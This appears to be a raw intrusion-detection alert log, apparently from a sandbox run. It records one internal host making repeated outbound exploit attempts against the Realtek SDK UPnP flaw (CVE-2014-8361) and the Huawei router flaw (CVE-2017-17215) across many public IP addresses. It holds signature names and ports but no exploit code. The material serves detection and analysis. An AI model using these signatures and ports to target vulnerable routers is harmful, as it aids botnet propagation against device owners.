                                                07/20/24-23:06:26.043403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6021852869192.168.2.1417.149.245.24
                                                07/20/24-23:05:37.542288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3659252869192.168.2.14162.47.82.104
                                                07/20/24-23:06:06.153640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3306052869192.168.2.1437.17.64.36
                                                07/20/24-23:05:48.801547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899637215192.168.2.1441.84.25.72
                                                07/20/24-23:05:59.845937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614476652869192.168.2.14126.180.229.141
                                                07/20/24-23:05:47.447079TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614526252869192.168.2.14114.223.237.120
                                                07/20/24-23:05:52.527430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5944052869192.168.2.1444.15.121.137
                                                07/20/24-23:06:35.414252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4371452869192.168.2.1490.198.177.65
                                                07/20/24-23:05:38.944157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033237215192.168.2.1441.236.232.24
                                                07/20/24-23:05:48.787750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158837215192.168.2.14197.118.203.241
                                                07/20/24-23:05:52.537891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4908852869192.168.2.1473.41.138.160
                                                07/20/24-23:06:01.224583TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25682452869192.168.2.14192.90.118.17
                                                07/20/24-23:06:04.825020TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24869252869192.168.2.14130.9.41.235
                                                07/20/24-23:06:00.451606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4537252869192.168.2.1495.161.141.86
                                                07/20/24-23:05:58.383835TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613463252869192.168.2.14221.158.4.113
                                                07/20/24-23:06:11.420819TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25517252869192.168.2.1475.115.110.52
                                                07/20/24-23:05:50.501247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916637215192.168.2.1457.211.225.146
                                                07/20/24-23:06:01.996519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4819252869192.168.2.142.42.46.69
                                                07/20/24-23:05:56.424976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274037215192.168.2.14197.200.200.227
                                                07/20/24-23:05:46.807504TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614203252869192.168.2.148.32.165.235
                                                07/20/24-23:06:27.853068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5246452869192.168.2.14204.140.235.247
                                                07/20/24-23:05:33.827023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859037215192.168.2.14157.183.110.42
                                                07/20/24-23:05:57.218020TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614837252869192.168.2.14129.14.146.10
                                                07/20/24-23:06:00.572173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4030652869192.168.2.14203.174.131.227
                                                07/20/24-23:06:54.322182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614441852869192.168.2.14123.193.150.74
                                                07/20/24-23:06:00.163232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5446852869192.168.2.1480.185.192.112
                                                07/20/24-23:05:46.113321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488037215192.168.2.14197.54.128.95
                                                07/20/24-23:05:59.266004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615672452869192.168.2.14157.159.224.198
                                                07/20/24-23:06:02.025297TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614560652869192.168.2.1473.79.90.127
                                                07/20/24-23:05:57.134757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4041252869192.168.2.14152.29.165.10
                                                07/20/24-23:05:50.522256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440037215192.168.2.14157.252.114.118
                                                07/20/24-23:06:09.741345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4317052869192.168.2.14179.227.5.10
                                                07/20/24-23:06:02.212762TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5604252869192.168.2.14194.102.249.55
                                                07/20/24-23:05:42.220683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433037215192.168.2.14197.37.108.11
                                                07/20/24-23:07:04.068388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4811652869192.168.2.1443.57.191.27
                                                07/20/24-23:05:57.342606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3839252869192.168.2.14222.83.92.112
                                                07/20/24-23:05:37.440953TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24687252869192.168.2.14210.29.223.179
                                                07/20/24-23:05:57.132087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4804252869192.168.2.1482.73.119.244
                                                07/20/24-23:05:58.706531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5942052869192.168.2.1418.247.202.59
                                                07/20/24-23:06:09.682183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615572252869192.168.2.14221.183.121.151
                                                07/20/24-23:05:36.327719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925037215192.168.2.14115.17.56.208
                                                07/20/24-23:05:57.037609TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615890052869192.168.2.14106.97.250.162
                                                07/20/24-23:06:09.635095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906452869192.168.2.14165.159.158.239
                                                07/20/24-23:06:01.185323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4884252869192.168.2.1450.186.160.203
                                                07/20/24-23:05:45.412130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894037215192.168.2.14197.36.12.42
                                                07/20/24-23:06:32.467103TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614380052869192.168.2.1449.137.240.216
                                                07/20/24-23:05:36.009637TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4581652869192.168.2.14162.96.80.170
                                                07/20/24-23:05:52.554753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24989852869192.168.2.14131.101.133.159
                                                07/20/24-23:05:57.460717TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613803852869192.168.2.14222.83.92.112
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504237215192.168.2.14197.115.224.42
                                                07/20/24-23:05:57.558741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4700052869192.168.2.1468.28.176.54
                                                07/20/24-23:06:01.468942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5319452869192.168.2.1472.144.78.222
                                                07/20/24-23:05:58.090071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032252869192.168.2.14162.39.12.155
                                                07/20/24-23:05:52.557906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24425052869192.168.2.14139.219.69.26
                                                07/20/24-23:05:47.101729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736237215192.168.2.14157.219.155.204
                                                07/20/24-23:05:38.513646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4865252869192.168.2.14200.65.225.77
                                                07/20/24-23:05:39.408822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615426252869192.168.2.14193.25.57.29
                                                07/20/24-23:05:56.893579TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615971452869192.168.2.14179.5.84.190
                                                07/20/24-23:06:23.212855TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615242452869192.168.2.14203.91.112.188
                                                07/20/24-23:06:17.662629TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23712452869192.168.2.1496.167.164.193
                                                07/20/24-23:06:08.497924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3987052869192.168.2.14200.147.46.193
                                                07/20/24-23:05:40.462908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4858252869192.168.2.1469.91.98.213
                                                07/20/24-23:06:13.638173TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615977052869192.168.2.1454.167.61.55
                                                07/20/24-23:06:04.222315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4093652869192.168.2.1442.230.189.186
                                                07/20/24-23:05:57.198650TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4735452869192.168.2.1438.249.4.4
                                                07/20/24-23:05:56.086217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992837215192.168.2.14157.41.4.23
                                                07/20/24-23:06:05.412182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6098852869192.168.2.1417.90.211.217
                                                07/20/24-23:06:10.507185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4064652869192.168.2.14119.77.231.32
                                                07/20/24-23:05:52.502632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23491452869192.168.2.1427.61.113.9
                                                07/20/24-23:06:03.095402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4776052869192.168.2.14182.89.241.66
                                                07/20/24-23:05:36.574959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997637215192.168.2.1412.157.227.73
                                                07/20/24-23:06:02.447932TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25974052869192.168.2.1457.97.23.2
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837237215192.168.2.14197.37.0.126
                                                07/20/24-23:05:58.112994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615846652869192.168.2.1441.93.92.223
                                                07/20/24-23:05:35.419591TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614497252869192.168.2.14134.226.59.80
                                                07/20/24-23:06:00.006350TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24930052869192.168.2.1467.83.53.203
                                                07/20/24-23:05:35.883933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613821452869192.168.2.149.71.131.31
                                                07/20/24-23:05:37.452253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5394452869192.168.2.14217.161.186.84
                                                07/20/24-23:05:48.808887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640037215192.168.2.1441.250.1.75
                                                07/20/24-23:05:35.450834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6049052869192.168.2.14188.199.48.64
                                                07/20/24-23:05:57.822356TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3951052869192.168.2.1457.81.241.118
                                                07/20/24-23:06:01.604739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5934052869192.168.2.14140.29.146.170
                                                07/20/24-23:06:05.344940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25776452869192.168.2.14157.159.224.198
                                                07/20/24-23:05:57.832966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614432652869192.168.2.1427.77.179.71
                                                07/20/24-23:06:01.263525TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5258452869192.168.2.1493.108.39.188
                                                07/20/24-23:06:22.982491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615220252869192.168.2.1460.46.231.159
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487237215192.168.2.14218.211.213.131
                                                07/20/24-23:05:33.853184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081837215192.168.2.14157.182.246.174
                                                07/20/24-23:05:48.762153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575437215192.168.2.14126.151.245.189
                                                07/20/24-23:05:36.354373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153437215192.168.2.1458.64.123.253
                                                07/20/24-23:05:48.767395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443637215192.168.2.14197.173.33.138
                                                07/20/24-23:05:58.378138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4614852869192.168.2.14125.193.155.236
                                                07/20/24-23:05:52.551649TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24967052869192.168.2.14220.104.129.24
                                                07/20/24-23:06:01.973350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5209652869192.168.2.14135.8.62.162
                                                07/20/24-23:05:39.216845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4834652869192.168.2.1468.41.73.225
                                                07/20/24-23:05:48.773442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936037215192.168.2.1441.40.7.30
                                                07/20/24-23:07:04.345966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613913452869192.168.2.14192.34.4.75
                                                07/20/24-23:06:05.614115TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25852652869192.168.2.14177.203.93.50
                                                07/20/24-23:06:09.698680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613796652869192.168.2.14196.147.50.36
                                                07/20/24-23:06:08.195958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4992652869192.168.2.1440.174.255.112
                                                07/20/24-23:06:02.368020TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24563852869192.168.2.1440.244.169.7
                                                07/20/24-23:05:46.060827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614615452869192.168.2.1441.126.157.26
                                                07/20/24-23:06:01.472267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5554852869192.168.2.14212.222.225.7
                                                07/20/24-23:05:47.382528TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4063452869192.168.2.1448.186.210.104
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699037215192.168.2.14157.40.221.74
                                                07/20/24-23:07:07.493314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5911452869192.168.2.14111.50.3.252
                                                07/20/24-23:05:33.831807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952237215192.168.2.14157.129.24.89
                                                07/20/24-23:05:59.426493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3923452869192.168.2.1418.34.122.251
                                                07/20/24-23:05:37.462705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25613652869192.168.2.1457.144.122.58
                                                07/20/24-23:05:40.483611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24515252869192.168.2.14106.152.34.222
                                                07/20/24-23:06:29.627964TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614543252869192.168.2.1482.89.3.197
                                                07/20/24-23:05:42.257817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225837215192.168.2.1441.96.28.202
                                                07/20/24-23:05:57.109755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051852869192.168.2.14201.191.195.148
                                                07/20/24-23:05:59.972369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5925252869192.168.2.14119.8.55.247
                                                07/20/24-23:06:08.365807TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25984052869192.168.2.1499.133.17.148
                                                07/20/24-23:06:02.606013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25753652869192.168.2.1480.43.192.97
                                                07/20/24-23:05:35.375806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5263052869192.168.2.14187.140.68.61
                                                07/20/24-23:06:00.205029TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613476852869192.168.2.14128.104.3.159
                                                07/20/24-23:05:35.387821TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614116252869192.168.2.14205.9.202.98
                                                07/20/24-23:05:45.117900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4820452869192.168.2.14183.184.211.239
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848037215192.168.2.14157.115.243.103
                                                07/20/24-23:05:59.823104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3562452869192.168.2.14126.248.230.246
                                                07/20/24-23:05:33.828884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573837215192.168.2.14197.48.133.159
                                                07/20/24-23:06:10.391415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614932652869192.168.2.142.225.107.63
                                                07/20/24-23:05:33.827209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363837215192.168.2.14197.164.78.122
                                                07/20/24-23:06:00.153687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4454852869192.168.2.1467.170.114.216
                                                07/20/24-23:05:36.332387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779637215192.168.2.14157.109.103.136
                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009237215192.168.2.14157.244.153.74
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821637215192.168.2.14197.174.117.38
                                                07/20/24-23:06:10.376182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613506252869192.168.2.14194.77.230.54
                                                07/20/24-23:06:41.550251TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614553652869192.168.2.14166.83.55.183
                                                07/20/24-23:05:59.787018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5659652869192.168.2.14160.75.130.165
                                                07/20/24-23:06:06.434054TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23495052869192.168.2.14209.246.221.148
                                                07/20/24-23:06:00.470172TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615000452869192.168.2.1447.131.236.250
                                                07/20/24-23:06:15.084045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614284252869192.168.2.14145.163.35.151
                                                07/20/24-23:06:00.417227TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5239452869192.168.2.1480.122.195.116
                                                07/20/24-23:05:56.993408TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615968052869192.168.2.14130.169.76.188
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363237215192.168.2.1441.136.144.80
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306237215192.168.2.14197.227.9.209
                                                07/20/24-23:05:40.461168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4289252869192.168.2.1436.106.161.161
                                                07/20/24-23:06:01.354528TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5202052869192.168.2.14207.13.1.7
                                                07/20/24-23:05:39.404370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615663452869192.168.2.1473.202.31.82
                                                07/20/24-23:05:57.960840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3841052869192.168.2.14204.53.157.110
                                                07/20/24-23:06:12.589035TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613577252869192.168.2.14169.101.195.68
                                                07/20/24-23:06:17.076848TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25953052869192.168.2.14176.50.156.26
                                                07/20/24-23:05:40.439699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336652869192.168.2.14131.183.255.118
                                                07/20/24-23:05:59.068340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4711652869192.168.2.1466.1.85.90
                                                07/20/24-23:05:52.468125TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4003852869192.168.2.1489.176.48.222
                                                07/20/24-23:06:08.528852TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24339852869192.168.2.14166.90.41.67
                                                07/20/24-23:05:46.273107TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4954852869192.168.2.14189.17.62.143
                                                07/20/24-23:05:52.697720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709052869192.168.2.14179.206.85.237
                                                07/20/24-23:05:58.720996TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26005652869192.168.2.14179.139.227.149
                                                07/20/24-23:06:09.698680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4379252869192.168.2.1419.121.240.220
                                                07/20/24-23:05:38.223936TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614582252869192.168.2.1489.172.236.176
                                                07/20/24-23:06:16.055924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3902852869192.168.2.1460.32.244.232
                                                07/20/24-23:06:01.949518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4109052869192.168.2.1481.135.180.241
                                                07/20/24-23:05:57.166360TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615468652869192.168.2.14137.7.11.114
                                                07/20/24-23:05:58.378138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4095652869192.168.2.14210.62.250.25
                                                07/20/24-23:06:07.959908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614667052869192.168.2.1417.95.5.182
                                                07/20/24-23:06:12.244446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24708652869192.168.2.142.174.24.244
                                                07/20/24-23:05:52.478141TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24732452869192.168.2.14207.210.54.245
                                                07/20/24-23:06:15.435068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5139252869192.168.2.14140.27.159.140
                                                07/20/24-23:05:50.600216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414837215192.168.2.1498.57.71.164
                                                07/20/24-23:06:08.328920TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613815652869192.168.2.14201.226.14.177
                                                07/20/24-23:06:00.170743TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23560252869192.168.2.14147.246.160.90
                                                07/20/24-23:06:07.664572TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4558052869192.168.2.14221.53.46.245
                                                07/20/24-23:05:45.345649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572037215192.168.2.14197.72.11.79
                                                07/20/24-23:06:08.565771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4081652869192.168.2.14115.163.246.125
                                                07/20/24-23:07:07.975226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3487452869192.168.2.14159.222.72.181
                                                07/20/24-23:05:50.600216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5588837215192.168.2.14197.169.228.207
                                                07/20/24-23:05:37.440208TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23503852869192.168.2.14157.223.126.25
                                                07/20/24-23:05:37.447263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4986052869192.168.2.14183.106.204.162
                                                07/20/24-23:05:42.245949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605237215192.168.2.14197.3.98.125
                                                07/20/24-23:05:44.364083TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23676852869192.168.2.1450.231.248.171
                                                07/20/24-23:06:13.319028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3608852869192.168.2.14178.92.19.218
                                                07/20/24-23:07:19.727778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615178252869192.168.2.14213.161.220.128
